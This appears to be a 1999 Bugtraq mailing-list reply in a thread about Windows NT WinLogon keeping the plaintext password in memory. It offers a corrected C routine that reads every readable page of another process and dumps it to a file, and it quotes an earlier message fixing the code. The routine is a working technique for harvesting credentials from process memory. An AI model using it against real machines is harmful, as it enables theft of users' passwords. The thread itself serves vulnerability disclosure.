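Actually there is a large bug in the code (well - it works just as well but thousands of times faster and is more correct): There is no reason to look beyond the application min and max address range and no reason to read in anything other than page sizes (since a VirtualAlloc will always round to at least the next largest page size). This was how I should have written it to begin with but I got lazy :)

/*
 * DumpMemory - write the readable pages of another process to a file.
 *
 * Walks the address range between lpMinimumApplicationAddress and
 * lpMaximumApplicationAddress (from GetSystemInfo) one page at a time and
 * appends every page that ReadProcessMemory() can read to the file at
 * szPath (opened with "wb"). Each run of contiguous readable pages is
 * preceded by a text marker line "\noffset <address>\n", so the output
 * mixes text markers with raw page bytes.
 *
 * hProc  handle to the target process; ReadProcessMemory() requires it to
 *        have been opened with PROCESS_VM_READ.
 * szPath path of the dump file to create or overwrite.
 *
 * Returns the number of target-memory bytes written (marker lines are not
 * counted), or 0 if the file could not be opened or the page buffer could
 * not be allocated. Failures are reported on stderr. The count is a DWORD,
 * so it wraps if more than 4 GiB is dumped on a 64-bit target.
 *
 * The dump holds whatever the target process keeps in memory - in the case
 * this thread is about, WinLogon's copy of the plaintext password - so the
 * output file is as sensitive as the process it was taken from.
 */
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
    SYSTEM_INFO si = {0};
    DWORD dwDumpedBytes = 0;
    BOOL bInRegion = FALSE;     /* TRUE while the previous page was readable */
    LPSTR lpBuf = NULL;
    LPSTR lpOffset;
    FILE *f;

    f = fopen(szPath, "wb");
    if (!f) {
        fprintf(stderr, "Unable to open %s\n", szPath);
        return 0;
    }

    GetSystemInfo(&si);

    /* VirtualAlloc rounds to page granularity, so one page is the natural
     * read unit; the buffer is freed on every exit path below. */
    lpBuf = malloc(si.dwPageSize);
    if (!lpBuf) {
        fprintf(stderr, "Unable to allocate %lu-byte page buffer\n",
                (unsigned long)si.dwPageSize);
        fclose(f);
        return 0;
    }

    for (lpOffset = si.lpMinimumApplicationAddress;
         (void *)lpOffset <= si.lpMaximumApplicationAddress;
         lpOffset += si.dwPageSize) {
        SIZE_T nRead = 0;   /* modern SDKs declare the out-parameter as SIZE_T * */

        if (!ReadProcessMemory(hProc, lpOffset, lpBuf, si.dwPageSize, &nRead)) {
            /* Unreadable page (free, reserved, guard, ...): the current
             * region ends here; the next readable page starts a new one. */
            bInRegion = FALSE;
            continue;
        }

        if (!bInRegion) {
            /* First readable page after a gap: emit its address as a marker.
             * %p is the only conforming specifier for a pointer value;
             * passing a pointer to %lx is undefined behaviour. */
            fprintf(f, "\noffset %p\n", (void *)lpOffset);
            bInRegion = TRUE;
        }

        if (fwrite(lpBuf, 1, nRead, f) != nRead) {
            fprintf(stderr, "Short write to %s\n", szPath);
            break;
        }
        dwDumpedBytes += (DWORD)nRead;

        /* lpOffset is advanced only by the for-increment. Advancing it here
         * as well would skip the page that follows every readable page. */
    }

    free(lpBuf);
    /* fclose flushes the last buffered pages; a failure here means the dump
     * on disk is incomplete even though the reads succeeded. */
    if (fclose(f) != 0) {
        fprintf(stderr, "Error closing %s\n", szPath);
    }
    return dwDumpedBytes;
}

-----Original Message-----
From: Jorge_Miguel_Pintoat_private [mailto:Jorge_Miguel_Pintoat_private]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvickat_private
Cc: BUGTRAQat_private
Subject: RE: NT WinLogon VM contains plaintext password visible in admin mode

I am sorry, but only read this today... There is small bug in this code...

<! LPSTR lpOffset = (void*)1; !>
LPSTR lpOffset = (LPSTR)1;

This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.

Greetings, J.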